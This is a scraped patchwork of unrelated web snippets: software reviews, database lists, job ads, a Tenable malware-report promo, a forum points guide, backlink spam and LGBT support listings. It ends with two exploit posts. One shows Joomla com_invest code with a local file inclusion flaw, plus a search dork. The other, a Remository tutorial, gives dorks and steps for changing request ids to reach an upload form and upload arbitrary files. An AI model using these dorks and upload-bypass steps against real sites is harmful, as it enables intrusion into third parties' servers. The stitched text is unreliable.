The paper ends with recommendations for future research on how experience with welfare affects perceptions and attitudes towards it, and on how to improve public perceptions of welfare.
              Why is my FileMaker Server showing authentication warnings for users when trying to connect to the related NRGship databases?   
    Seeing user authentication failed warnings in your FileMaker Server log is a common occurrence, and there is no need to be alarmed. These warnings occur when your FileMaker database is related to th ...
              Comment on Organic Mascara Review by Karen   
    Just thought you might want to know, Hauschka isn't organic (his mascara tests moderately toxic as opposed to less toxic on the Cosmetics Database), and that both Nvey and Hauschka refuse to sign an agreement with the EWG. Both companies won't guarantee that they or their suppliers don't test on our animal friends, either. I continue my quest for truly organic AND ethical!!!! Thanks for your input, though.
          OpenOffice.org 4.0.1 PowerPC - A luxury suite that costs you nothing   

    Gone are the days when you were forced to pay a prohibitive price (or get yourself an illegal copy) to have an efficient suite of programs for writing a letter, creating a presentation, or working with a spreadsheet. Now there are completely free, functional, and legal alternatives, among which OpenOffice.org stands out.

    Based on the StarOffice code, released freely by Sun Microsystems, this open source application bundle includes Writer (word processor), Calc (spreadsheet), Impress (presentations), Base (database), Math (mathematical formulas), and Draw (vector graphics). The suite works with many document formats, can export to PDF, and is fully compatible with the most widespread Microsoft Office formats (including .doc, .xls, and .ppt).

    All the applications have an intuitive interface, localized in Italian and very similar to that of the MS Office programs, so you won't struggle to feel at home. They work, and they are stable, reliable, and completely free. And the developer community is starting to turn out the first Mac extensions that add to their functionality. Seeing is believing? You'll be converted.

    Overall verdict
    Everything that paid office suites offer, not only free of charge but in some cases with even more advanced features, excellent stability, full compatibility with standard formats, and an intuitive interface in Italian.

    Download OpenOffice.org 4.0.1 PowerPC from Softonic

          Popular Web Programming Languages and the Databases They Use    
    Curious about the technologies used by the popular web services on the internet? Their fast performance, dynamic information, and interactive presentation are something you can emulate on the website you manage. If you are already using these technologies, then, at this early stage at least, you are on the right track.

    Behind their dynamic, interactive pages, the programming languages and database engines used on their servers turn out to be the following:
    • Google: programming in C, C++, Java, Python, and PHP; database: BigTable.
    • Facebook: programming in PHP, C++, Java, Python, Erlang; database: MySQL.
    • YouTube: programming in C, Python, Java; database: MySQL.
    • Yahoo: programming in PHP; database: MySQL.
    • Live: programming in ASP.NET; database: Microsoft SQL Server.
    • MSN: programming in ASP.NET; database: Microsoft SQL Server.
    • Wikipedia: programming in PHP; database: MySQL.
    • Blogger: programming in Python; database: BigTable.
    • Bing: programming in ASP.NET; database: Microsoft SQL Server.
    • Twitter: programming in C++, Java, RoR, Scala; database unknown.
    • Wordpress: programming in PHP; database: MySQL.
    • Amazon: programming in Java, J2EE, C++, Perl; database unknown.
    • eBay: programming in Java, WebSphere, Servlets; database: Oracle.
    • Linkedin: programming in Java, Scala; database unknown.

    As for client-side programming, most of these sites use JavaScript and Ajax. Flash is used only on YouTube, and Silverlight is probably used only on Microsoft sites such as Live, MSN, and Bing.

          Types of Databases and Their Technologies    
    In this era of computers and the internet, the role of the database is dominant. Almost all administrative activity in offices and institutions is now integrated into computing systems built around a unified database model. Likewise, online services on the internet cannot be separated from the role of databases. So what kinds of technology are used to manage them?

    Database Server

    Below is a list of database technologies, most of which are Relational Database Management Systems (RDBMS):
    • Apache Derby (formerly known as IBM Cloudscape): an open source database engine developed by the Apache Software Foundation. Commonly used in Java programs and for online transaction processing.
    • IBM DB2: a proprietary (commercial) database engine developed by IBM. DB2 comes in three variants: DB2 for Linux - Unix - Windows, DB2 for z/OS (mainframe), and DB2 for iSeries (OS/400).
    • Firebird: an open source database engine developed by the Firebird Project. Commonly run on Linux, Windows, and various Unix variants.
    • Microsoft SQL Server: a proprietary (commercial) database engine developed by Microsoft, although a freeware edition is also available. Commonly used on the various versions of Microsoft Windows.
    • MySQL: an open source database engine developed by Oracle (previously Sun and MySQL AB). The most widely used database engine in the world, commonly deployed for web applications.
    • Oracle: a proprietary (commercial) database engine developed by Oracle Corporation. It comes in several variants aimed at different segments and purposes.
    • PostgreSQL (or Postgres): an open source database engine developed by the PostgreSQL Global Development Group. Available on many operating system platforms, including Linux, FreeBSD, Solaris, Windows, and Mac OS.
    • SQLite: an open source database engine developed by D. Richard Hipp. Known for the very small size of its program, it is commonly embedded in other applications, for example in web browsers.
    • Sybase: a proprietary (commercial) database engine developed by SAP. Targeted at mobile application development.
    • WebDNA: a freeware database engine developed by WebDNA Software Corporation. Designed for use on the web.
    • Redis: an open source database engine developed by Salvatore Sanfilippo (sponsored by VMware). Intended for networked use.
    • MongoDB: an open source database engine developed by 10gen. Available for many operating system platforms and known to be used by Foursquare, MTV Networks, and Craigslist.
    • CouchDB: an open source database engine developed by the Apache Software Foundation. Focused on use on web servers.
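    As a small illustration of why SQLite is so easily embedded: the entire engine runs in-process, so a complete create-insert-query cycle needs nothing but Python's bundled sqlite3 module (the table and values here are invented for the example).

```python
import sqlite3

# The whole database engine lives in-process; ":memory:" avoids even a file.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE engines (name TEXT, license TEXT)")
conn.executemany(
    "INSERT INTO engines VALUES (?, ?)",
    [("SQLite", "open source"), ("Oracle", "commercial")],
)
rows = conn.execute(
    "SELECT name FROM engines WHERE license = 'open source'"
).fetchall()
print(rows)  # [('SQLite',)]
conn.close()
```

    No server process, no configuration: this is the property that lets browsers and mobile apps ship SQLite inside the application itself.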

              Junior Database Administrator / Report Developer   
    RI-East Greenwich, We are currently engaged with a client who is seeking a Junior SQL Database Administrator / Developer on a full-time direct employee basis. In this role, the Database Administrator will: Assist in the maintenance, performance and uptime of SQL and other database instances in a Linux - UNIX environment. Create and modify bash scripts and Windows command scripts. Manage tablespace, storage allocatio
              Staying Ahead of the Curve   
    Tenable.io Malicious Code Prevention Report

    As malware attacks continue to make headlines, many organizations struggle to stay ahead of the complex, evolving threat landscape. Attackers use both old and new ways to deliver malware through exploiting existing vulnerabilities, evading security solutions, and using social engineering to deliver malicious payloads. Millions of unique pieces of malware are discovered every year, and even with the best security controls in place, monitoring the thousands of endpoints within your network for malware can be nearly impossible.

    Use Tenable.io to quickly address systems that are at risk

    Once inside your network, malware can disable security controls, gain access to privileged accounts, replicate to other systems, or maintain persistence for long periods of time. If these risks are not addressed quickly, they can result in long term, devastating consequences for any organization. Using the Malicious Code Prevention Report from Tenable.io™ provides you with the visibility needed to quickly address systems that are at risk.

    Malicious Code Prevention Report

    Malware scanning

    Tenable.io includes a customizable malware scan template where you can incorporate both known-good and known-bad MD5 hashes, along with a hosts file whitelist. On Windows systems, the default hosts file contains commented lines of text and two localhost address entries. Most systems will query local DNS servers to resolve domain names to IP addresses. Some organizations will add entries into hosts files for dedicated systems within their environment or to block unauthorized websites. Once a hosts file is modified, the local system will use the entries within the hosts file first and bypass records within your DNS server.
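    The known-hash idea behind such a scan template can be sketched in a few lines (this is an illustration, not Tenable's implementation; the function name is ours, and the two hashes are the well-known EICAR test-file and empty-file MD5s).

```python
import hashlib

# Hypothetical known-hash lists, standing in for the "good and bad
# known MD5 hashes" a malware scan template can be configured with.
KNOWN_BAD = {"44d88612fea8a8f36de82e1278abb02f"}   # EICAR test file
KNOWN_GOOD = {"d41d8cd98f00b204e9800998ecf8427e"}  # empty file

def classify(data: bytes) -> str:
    """Classify file contents by MD5 against the known-hash lists."""
    digest = hashlib.md5(data).hexdigest()
    if digest in KNOWN_BAD:
        return "malicious"
    if digest in KNOWN_GOOD:
        return "whitelisted"
    return "unknown"

print(classify(b""))  # "whitelisted"
```

    Real scanners pair this exact-match check with heuristics, since hash lists only catch byte-identical samples.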

    Malware also targets the hosts file to insert redirects to malicious sites or block security solutions from obtaining patches and security updates. For organizations utilizing the hosts file, the Malware Scan template provides you with the ability to add whitelist entries that would otherwise be flagged as abnormal by existing security solutions within your environment.
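    The hosts-file whitelisting idea reads naturally as code. The sketch below is illustrative only (the entries and whitelist are made up, not Tenable's logic): parse the file, skip comments, and flag any IP-to-name mapping not on the approved list.

```python
# Sketch of hosts-file whitelist checking (illustrative only).
HOSTS_FILE = """\
# Default entries
127.0.0.1 localhost
::1 localhost
10.0.0.5 intranet.example.local
127.0.0.1 update.antivirus-vendor.example
"""

# Entries the organization has approved (hypothetical).
WHITELIST = {
    ("127.0.0.1", "localhost"),
    ("::1", "localhost"),
    ("10.0.0.5", "intranet.example.local"),
}

def suspicious_entries(hosts_text):
    """Return (ip, hostname) pairs not found on the whitelist."""
    flagged = []
    for line in hosts_text.splitlines():
        line = line.split("#")[0].strip()  # drop comments and blanks
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            if (ip, name) not in WHITELIST:
                flagged.append((ip, name))
    return flagged

# Flags the redirect that would block a security vendor's updates:
print(suspicious_entries(HOSTS_FILE))
```

    The last entry is the malware-style case described above: pointing a security vendor's update host at localhost silently blocks patches.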

    Malware Scan template

    Enabling the File System Scanning option lets you scan specific directories within your Windows environment, such as the C:\Windows, C:\Program Files, and User Profile directories, that are frequently used to install malware. You can also scan for malware within directories such as C:\ProgramData that are hidden by default on Windows systems.

    Scanning files

    Organizations can have any number of mapped drives and devices connected to a system. Most anti-virus solutions only scan default directories such as the C:\ drive, and without additional rules in place, malware could easily bypass this security control via flash drive or external USB drive.

    The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution

    The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution. Using the Custom File Directories option, you can include a list of directories within your scan to target mapped drives and attached devices.

    Yara rules can also be incorporated into your Tenable.io malware scan. Using a combination of regular expressions, text strings, and other values, Yara will examine systems for specific files that match values within the rules file.
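    Yara has its own rule syntax, but the matching model is easy to see in miniature. The sketch below is a rough Python analogue (not real Yara syntax or the yara library): named byte patterns plus a boolean condition over which patterns matched.

```python
import re

# Toy model of a Yara-style rule: named patterns plus a condition
# over the set of patterns that matched (illustrative only).
rule = {
    "strings": {
        "$url": re.compile(rb"evil\.example\.com"),
        "$magic": re.compile(rb"^MZ"),  # PE executable header bytes
    },
    # Flag only executables that also embed the suspicious domain.
    "condition": lambda hits: "$magic" in hits and "$url" in hits,
}

def matches(rule, data: bytes) -> bool:
    """Evaluate the rule's condition over the patterns found in data."""
    hits = {name for name, pat in rule["strings"].items() if pat.search(data)}
    return rule["condition"](hits)

print(matches(rule, b"MZ\x90\x00 ... evil.example.com ..."))  # True
print(matches(rule, b"plain text"))                            # False
```

    Real Yara rules add string modifiers, hex patterns, and richer conditions, but the structure is the same: declared strings, then a condition over them.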


    The Malicious Code Prevention report provides a comprehensive overview of systems infected with malicious backdoors, hosts communicating with botnets, and vulnerabilities that can be exploited by malware, to name just a few.

    Along with malware and malicious processes, this report also highlights systems with vulnerabilities that are exploitable by malware. Exploitable vulnerabilities can provide attackers with a backdoor into your network to enable privilege escalation or launch malicious code.

    Hosts with vulnerabilities that are exploitable by malware

    Tenable.io uses both active and passive methods to detect malicious content

    Tenable.io uses both active and passive methods to detect malicious content, including web traffic analysis, md5sum matching, public malware databases, and links pointing to known malware operators. Web servers hosting malicious content are also included within this report. Malicious code can be injected into a website through a cross-site scripting (XSS) or SQL injection vulnerability.

    Attackers often target websites to deliver malicious payloads to a larger audience through message boards or blog posts. Malicious code often remains hidden within iframes, JavaScript code, and other embedded tags that link to third-party websites. This data can help you target and remediate issues on web servers before critical assets or services are impacted.

    Botnets often use the HTTP protocol as well as encryption to evade detection by modern security solutions. Information reported by Nessus® and Nessus Network Monitor highlights active inbound and outbound communications with command and control (C&C) servers.

    Hosts interacting with known botnets

    Keeping your anti-virus clients updated helps to ensure your systems remain protected from malware. This report provides valuable information on the status of your anti-virus and anti-malware solutions, ensuring that they are installed and up to date. The Malware Protection chapter provides a summary of hosts running up-to-date anti-virus clients per operating system.

    Anti-virus status

    Tenable.io will analyze hosts with outdated anti-virus clients and provide targeted information you can use to remediate issues with those clients. Data is collected from Nessus checks of the status of various anti-virus clients across Windows, Linux, and Unix-based platforms. This information can also help you determine whether your anti-virus client has been disabled.

    Outdated anti-virus details

    No organization is immune from vulnerabilities and attacks

    No organization is immune from vulnerabilities and attacks. Knowing how systems are compromised can help target response efforts and minimize future damage. Tenable.io provides you with critical insight needed to measure the effectiveness of your security program, and to gain insight into your current risk posture. Using the Malicious Code Prevention report by Tenable.io provides you with targeted information to prioritize remediation efforts, close malicious entry points, and stay one step ahead of attackers and other persistent threats.

    Start with Tenable.io

    To learn more about Tenable.io, visit the Tenable.io area of our website. You can also sign up for a free trial of Tenable.io Vulnerability Management.

              Oracle XMLDB XQuery Update in Database Release   

    I just made use of the very cool OTN Virtual Developer Day Database site. In this environment you can follow OTN Developer Day sessions, for example at home, while making use of all the material available on that site plus the downloadable Virtualbox OTN Developer Day Appliance. Although you can choose tracks like Java, [...]

    The post Oracle XMLDB XQuery Update in Database Release appeared first on AMIS Oracle and Java Blog.

              Autonomics to Modernize DB Administration   
    There is a clear trend to automate and enable computerized tasks to streamline and optimize administrative and maintenance tasks. Many database (DB) management tasks that today require oversight and hand-holding by Database Administrators (DBAs) can, over time, be turned over to intelligently automated software to manage. But automation is just the first step. With autonomic […]
              Call Center Representative   
    NY-Mineola, Duties: Determines requirements by working with customers. Answers inquiries by clarifying desired information; researching, locating, and providing information. Handles heavy inbound and outbound calls Resolves problems by clarifying issues; researching and exploring answers and escalating unresolved problems. Maintains call center database by entering information. Updates job knowledge by partic
              The ActiveRain Point System   
    ActiveRain awards points to our members as a way to motivate them to engage with others and share their expertise. You can earn points through community events like entering a contest, taking a survey, or attending a meet-up, but most of the points you accumulate will come from your daily interaction on ActiveRain.

    What makes ActiveRain different from any other online community is the willingness of agents and real estate professionals to help one another in their business and in life. Face it… real estate is a tough gig and you need a strong support network to survive!

    This post will walk you through all of the essential elements of our scoring system.

    When Points Are Awarded

    We have about 50 different "scoring events" running behind the scenes. These events are constantly evolving based on feedback we get from the community. Here are the scoring events, organized by the "point buckets" you'll see on your points page.

    Notice: ActiveRain changes the scoring system on occasion as we release new upgrades or respond to people abusing the system. We'll do our best to keep this up-to-date, but please use this as a reference tool only.

    Blogging Points
    Scoring Events Points Frequency
    You published a new blog post 225 10 per week 
    Your blog post was featured 100 1 per day
    A member bookmarked your blog post 25 3 per day
    Your blog post received a new comment 6 50 per day
    A member "Liked" your blog post 5 25 per day
    A member re-blogged your post 25 1 per day
    You reblogged another member's post 25 1 per day
    A member subscribed to comments on your blog  0 N/A
     Commenting Points
    Scoring Events Points Frequency
    You commented on a blog post 25 20 per day
    You tagged a member in a comment   0 N/A
     Product Reviews
    Scoring Events Points Frequency
    You submitted a product review   50 1 per day
     Profile Points
    We have numerous scoring events for our members as they set up or enhance their profile page. In general, you'll earn 25-100 points for every section the first time you update it.
     Q&A Points
    Scoring Events Points Frequency
    You published a new question 10 1 per day 
    Your question was featured 50 1 per day
    A member bookmarked your question 25 3 per day
    You answered another member's question 15 20 per day
    A member "Liked" your answer 10 5 per day
    Your question received an answer 0 N/A
    A member "Liked" your question 0 N/A
    A member subscribed to answers on your question  0 N/A
    You tagged a member in an answer 0 N/A
    You "Liked" a question 0 N/A
     Invite Points
    Scoring Events Points Frequency
    Your invitation was accepted by someone you invite to ActiveRain   250 20 per day
     Other Points
    Scoring Events Points Frequency
    You logged in today 100 1 per day
    A member "Followed" you 50 5 per day
    You "Followed" another member 10 5 per day
    You reported a confirmed spam question, answer, or comment   5 5 per day
    You bookmarked another member's blog post 0 N/A
    You "Liked" another member's blog post 0 N/A
     Points May be Deducted from Your Account
    Our goal is to make our points a reward system, not to be punitive and deduct points all the time. That being said, there are certain scoring events that can be reversed (you lose the points). Examples include: deleting a blog post, deleting a comment, and unfollowing a member. We have a rule in the system stating that any points are locked in after six months. So, if you go in and delete an outdated blog post from 2012, you won't be penalized. There are also times when we will deduct points from a member's account if we feel they are blatantly abusing the points system.

    View Your Points At Any Time
    Members can navigate to the "Points" page on their computer or phone to see how they are tracking on points this month and to see the total points accumulated on their account. The points are organized into smaller "buckets" so you can quickly see where your engagement is strongest.

    Earn 10% of the Points for Every Person You Invite
    One of the fastest ways to accumulate points on ActiveRain is by inviting new members and coaching them on how to engage within the community. When a member accepts your invitation, we attach them to your account in our database. At the end of each month, our system awards you a bonus equal to 10% of any points your invitees earned, paid as a single lump sum. For example, if your invitees earn a combined 2,000 points in a month, you receive a 200-point bonus.

    Summary
    We always want points on ActiveRain to be a positive experience for you. They should motivate you to engage with your peers and to share your secrets in the real estate industry's top online community. If you ever see something that feels out of line, you are welcome to let us know about it.

    --- Keep Up In the Rain!
    Enter your email address: Delivered by FeedBurner

              FREE Quad Classifieds   
    Find A Quad, a database of all things quad and ATV for sale and wanted in the UK. The FREE online classifieds for quads and ATVs. Buy or sell your quad for FREE; visit our website today.

    Free Backlink for your site

    This program is a free automatic backlink exchange service that also brings free web traffic from other users. Everyone knows how important backlinks are for achieving a high PageRank. Here we offer a free, fast backlink for your sites, with no registration required :) .

    Copy the HTML code below and paste it into your website or blog. To view your backlink, click the image link from your website or blog; your website URL will then be listed in the latest references. When a visitor clicks the image link from your website or blog, your URL is added automatically to our database. Remember: if you remove the code from your site, your link is removed from our database.

    Free Plugboard Link Banner Button :

     Banner 486x60


    Get a free plugboard!

    Banner 80x15

    Text Link

              Creating a MySQL Database for WordPress   
    What is MySQL database? A database refers to a collection of organized data. In the case of a website, the […]
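    The excerpt above is truncated, but the usual recipe is short. A sketch, using mysqli with invented names (wordpress_db, wp_user) and placeholder credentials you would replace with your own, of the statements typically run before installing WordPress:

    ```php
    <?php
    // Sketch: create a database and a dedicated user for WordPress via mysqli.
    // Host, credentials, and names below are placeholders, not real values.
    $mysqli = new mysqli('localhost', 'root', 'root_password');

    $mysqli->query("CREATE DATABASE wordpress_db DEFAULT CHARACTER SET utf8mb4");
    $mysqli->query("CREATE USER 'wp_user'@'localhost' IDENTIFIED BY 'choose-a-strong-password'");
    $mysqli->query("GRANT ALL PRIVILEGES ON wordpress_db.* TO 'wp_user'@'localhost'");
    $mysqli->query("FLUSH PRIVILEGES");
    $mysqli->close();
    ```

    The database name, user, and password then go into wp-config.php (the DB_NAME, DB_USER, and DB_PASSWORD constants) during the WordPress install.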
              Support Groups and Organizations   



    Being gay, lesbian, bisexual or transgendered is perfectly normal and healthy. Your sexual orientation and gender identity make up your personal composition. Sometimes, it takes time to figure out all of these sexual and gender feelings. It is okay to be unsure whether you are gay or straight or to be uncertain about whether you should come out. Remember that you are not alone. There are people out there with the same questions and concerns that you have. The following is a list of internet resources that provide valuable information to gay, lesbian, bisexual, or transgendered people about lifestyles, where to find support groups in your area, and various issues faced by GLBT people every day.

    *PFLAG is a home for gay, lesbian, bisexual and transgendered people. PFLAG has chapters in over 460 communities across the nation along with help-lines you can call. They can help find a chapter near you, as well as answer important questions about pertinent issues in the homosexual community. PFLAG also supports, educates and advocates for equal civil rights for gay, lesbian, bisexual and trangendered people.

    The task force for same sex marriage has created a website devoted to defeating anti-same sex marriage proposals. It provides a means to contact government officials, view recent news articles, and read real-life stories pertaining to gay and lesbian marriages.

    The International Lesbian and Gay Association is a world-wide federation of national and local groups dedicated to achieving equal rights for lesbians, gays, bisexuals and transgendered people everywhere. It provides information pertaining to how to get involved in the liberation of GLBT's across the globe and information on government and public events, recent activities, and an email directory of members.

    This is a guide to social and support organizations for gay lifestyles that help people match their needs or interest with those of other gays.

    This is a project developed by advocates for GLBT youths. It includes sites pertaining to youth health issues, lives, stories, advocacy, sexual health and well-being, information on how and why to have safer sex, community, youth HIV, school life for high school and college students, youth group listings, facts and stories about coming out, resources, and support for young gay men, bi-youths, youths of color, transgendered youths, lesbian youths, deaf GLBT youths, and more.


    Finding out that a loved one is gay, lesbian, bisexual, or transgendered often triggers a difficult series of transitions away from past thought processes into new and more refined ones. Most people aren't prepared to hear, "I'm gay," from their loved ones. It is important to realize that many people have initial feelings of confusion when they are first introduced to this concept. Many may find themselves going through something similar to a grieving process with all the shock, denial, anger, guilt and sense of loss that accompanied the news. So if those are the feelings with which you're dealing, they're understandable. Statistics show that one in every ten people in this country and around the world is gay. Therefore, approximately one in four families has an immediate family member who is gay, lesbian or bisexual, and most people have at least one gay, lesbian, bisexual or transgendered member in their extended circle of friends and family.

    Although, at times, it may feel as though you have lost someone close to you, you haven't. It is your perception of them that has changed. Your loved one is the same person he or she was before you heard the news; the only difference is that they now have a different image in your eyes. That loss can be very difficult, but that image can, happily, be replaced with a new and clearer understanding of your loved one.

    An excellent resource for friends and family.

    COLAGE (Children of Lesbians and Gays everywhere) is the only national and international organization in the world specifically supporting young people with gay, lesbian, bisexual, and transgender parents. Their mission is to "foster the growth of daughters and sons of lesbian, gay, bisexual and transgender parents of all racial, ethnic, and class backgrounds by providing education, support and community on local and international levels, to advocate for our rights and those of our families, and to promote acceptance and awareness that love makes a family."

    QueerAmerica is a database published by OutProud, The National Coalition for Gay, Lesbian, Bisexual and Transgender Youth. It is the largest collection of lesbian and gay resources in the nation, and includes information on community centers, support organizations, queer youth groups, and more. These can be great places to meet friends, get questions answered, or find support.

    This site was created by the Partners Task Force for Gay & Lesbian Couples. It is a national resource for same-sex couples, supporting the diverse community of committed gay and lesbian partners through a variety of media, including more than 200 essays, surveys, legal articles and resources on legal marriage, ceremonies, domestic partner benefits, relationship tips, parenting, and immigration.


              Joomla ( com_invest ) LFI vuln   

    0     _                   __           __       __                     1
    1   /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm Caddy-dz member from Inj3ct0r Team                 1
    1               #########################################              0

    # Exploit Title: Joomla Component com_invest LFI Vulnerability
    # Author: Caddy-Dz
    # Facebook Page: http://www.facebook.com/ALG.Cyber.Army
    # E-mail: islam_babia@hotmail.com
    # Category:: webapps
    # Plugin: http://software.skuzet.nl/component/option,com_phocadownload/Itemid,3/id,7/view,category/
    # Google Dork: [inurl:index.php?option=com_invest controller=]
    # Security Risk: medium
    # Tested on: Windows Seven Edition Integral / French

    # Sp Greetz To 1337day Team

    [*] Vulnerable Code :

    // get controller
    if ($controller = JRequest::getVar('view')) {
            $path = JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php';
            if (file_exists($path)) {
                    require_once ($path); // the controller file is included here; $controller reaches the path unsanitised
            } else {
                    JError::raiseError(JText::_('unknown controller'));
            }
    }
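    Nothing strips path separators from the attacker-supplied view value before it is spliced into the include path, so ../ sequences resolve outside the controllers directory. A standalone sketch of the path computation (the constants and the traversal value are invented for illustration, not taken from a real target):

    ```php
    <?php
    // Illustration only -- not the component's code. DS and JPATH_COMPONENT
    // stand in for Joomla's constants.
    define('DS', '/');
    define('JPATH_COMPONENT', '/var/www/components/com_invest');

    // A hypothetical attacker-controlled 'view' value with traversal sequences:
    $controller = '../../../../tmp/evil';
    $path = JPATH_COMPONENT . DS . 'controllers' . DS . $controller . '.php';

    // The computed path walks back out of the controllers directory:
    echo $path; // /var/www/components/com_invest/controllers/../../../../tmp/evil.php
    ```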
    [*] Exploit :

              Arbitrary File Upload Vulnerability (com_remository)   

    << Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability

    << Author : Z190T

    << Contact : mahruz[dot]id[at]gmail[dot]com

    << Homepage : http://mahruz-id.com/

    << Vendor : http://remository.com/downloads/

    << d0rk :

    - inurl:"func=addfile" <– Organisation, School, Academic and Government of Indonesian Site

    - inurl:"/func,addfile/" <– Organisation, School, Academic and Government of Indonesian Site

    - inurl:"index.php?option=com_remository" <– free!!

    << File Allowed : Any File Extension

    << Try 0n : any OS

    << readme.

    First of all, I just want to point out one important thing: be careful when choosing plugins or components for your site, whether it runs Joomla, WordPress, Drupal, or anything else. It doesn't matter how good the site you build looks; a pretty front end is no guarantee of security. What matters is a website that stays simple while backed by above-average security.

    I will show you one of the many weaknesses of a Joomla component, namely Repository. The repository in question is a collection of downloadable files made openly available to users, admins, and even all visitors.

    Remository is the new name for the Repository component in Joomla; honestly, I have no idea why they had to go with the name Remository??

    Whatever!!

    Anyway, enough of my rambling! Let's get straight to it…

    << For the dorks [inurl:"func=addfile"] and [inurl:"index.php?option=com_remository"]

    Example:


    “You have no permitted upload categories – please refer to the webmaster”

    There we can see that we have no permission to upload data with id 15 in section 46; only the Admin is allowed to upload data to that area. So how do we upload data there anyway? "Ooh, it can't be done!" ← only a fool would say that! We simply manipulate the data we submit. Let's do it!!

    Leave the ItemId part as it is; the only thing we change is the id. Inject a little here and there until the upload table shows up!! ^_^






    and so on… until it finally pops out!! heheheheee….

    If you get bored of injecting, just go straight to the highest number, for example…


    but if, for example, we end up at…


    upload right away!! Don't forget to fill in the form, so it's easier to find the directory where the upload ends up.

    All Done!

    Please Note: All Uploads will be reviewed prior to Publishing.

    Yes!! We did it!!

    To my mind, finding the uploaded file is the slightly difficult part, because the file we uploaded has already gone through the converter in ../remositoryAdminDbconvert.php

    its contents look like this…


    class remositoryAdminDbconvert extends remositoryAdminControllers {

        function remositoryAdminDbconvert ($admin) {
            remositoryAdminControllers::remositoryAdminControllers ($admin);
            $_REQUEST['act'] = 'dbconvert';
        function listTask () {
            $view =& new remositoryAdminHTML ($this, 0, '');
            $interface =& remositoryInterface::getInstance();
            $database =& $interface->getDB();
            foreach (array('containers','files','reviews','structure','log','temp') as $tablename) {
                $sql = "TRUNCATE TABLE #__downloads_$tablename";
            $sql = "ALTER TABLE #__downloads_containers AUTO_INCREMENT=2";
            $containermap = array('catid'=>array(),'folderid'=>array());
            $sql = "SELECT * FROM #__downloads_category";
            $rows = $database->loadObjectList();
            if (!$rows) $rows = array();
            foreach ($rows as $row) {
                if ($row->registered) $row->registered = '0';
                else $row->registered = '2';
                foreach ($row as $field=>$value) {
                    if (!is_numeric($row->$field)) $row->$field = $database->getEscaped($row->$field);
                $sql = "INSERT INTO #__downloads_containers (parentid,name,published,description,filecount,icon,registered) VALUES (0,'$row->name',$row->published,'$row->description',$row->files,'$row->icon',$row->registered)";
                if (!$database->query()) {
                    echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
                $newid = $database->insertid();
                $containermap['catid'][$row->id] = $newid;
                $sql = "SELECT * FROM #__downloads_folders WHERE catid=$row->id";
                $folders = $database->loadObjectList();
                if ($folders) {
                    foreach ($folders as $folder) $this->convertfolder ($folder, $newid, $containermap);
            $sql = "SELECT * FROM #__downloads";
            $files = $database->loadObjectList();
            if (!$files) $files = array();
            foreach ($files as $file) {
                $testurl = strtolower(trim($file->url));
                $findsite = strpos($testurl, strtolower(trim($interface->getCfg('live_site'))));
                if ($findsite===false){
                    $islocal = '0';
                    $realname = '';
                    $filedate = date('Y-m-d');
                    $url = $file->url;
                    if (eregi(_REMOSITORY_REGEXP_URL,$url) OR eregi(_REMOSITORY_REGEXP_IP,$url)) $filefound = true;
                    else $filefound = false;
                else {
                    $islocal = '1';
                    $url = '';
                    $realname = $url_array[(count($url_array)-1)];
                    $filepath = $this->repository->Down_Path.'/'.$realname;
                    if (file_exists($filepath)) {
                        $filefound = true;
                        $filedate = date('Y-m-d', filemtime($this->repository->Down_Path.'/'.$realname));
                    else $filefound = false;
                $containerid = 0;
                if ($file->catid != 0) {
                    if (isset($containermap['catid'][$file->catid])) $containerid = $containermap['catid'][$file->catid];
                    else echo '<tr><td>'.$file->id.'/'.$realname.'/'.$file->catid.'</td></tr>';
                if ($file->folderid != 0) {
                    if (isset($containermap['folderid'][$file->folderid])) $containerid = $containermap['folderid'][$file->folderid];
                    else echo '<tr><td>'.$file->id.'/'.$realname.'/'.$file->folderid.'</td></tr>';
                if ($filefound AND $containerid != 0) {
                    foreach (get_class_vars(get_class($file)) as $field=>$value) if (is_string($file->$field)) $file->$field = $database->getEscaped($file->$field);
                    $sql="INSERT INTO #__downloads_files (realname,islocal,containerid,published,url,description,smalldesc,autoshort,license,licenseagree,filetitle,filesize,filetype,downloads,icon,fileversion,fileauthor,filedate,filehomepage,screenurl,submittedby,submitdate) VALUES ('$realname',$islocal,$containerid,$file->published,'$url','$file->description','$file->smalldesc',$file->autoshort,'$file->license',$file->licenseagree,'$file->filename','$file->filesize','$file->filetype','$file->downloads','$file->icon','$file->fileversion','$file->fileauthor','$filedate','$file->filehomepage','$file->screenurl', $file->submittedby,'$file->submitdate')";
                    if (!$database->query()) {
                        echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
                    $newid = $database->insertid();
                    $sql = "SELECT * FROM #__downloads_comments WHERE id=$file->id";
                    $comments = $database->loadObjectList();
                    if ($comments) {
                        foreach ($comments as $comment) {
                            $sql = "INSERT INTO #__downloads_reviews (component,itemid,userid,title,comment,date) VALUES ('com_remository',$newid,'$comment->userid','Review Title','$comment->comment','$comment->time')";
                else echo '<tr><td>'.$file->url.'</td></tr>';
            echo '<tr><td class="message">'._DOWN_DB_CONVERT_OK.'</td></tr>';
            echo '</table></form>';
        function convertfolder ($folder, $parent, &$containermap) {
            $interface =& remositoryInterface::getInstance();
            $database =& $interface->getDB();
            foreach ($folder as $field=>$value) {
                if (!is_numeric($folder->$field)) $folder->$field = $database->getEscaped($folder->$field);
            if ($folder->registered) $folder->registered = '0';
            else $folder->registered = '2';
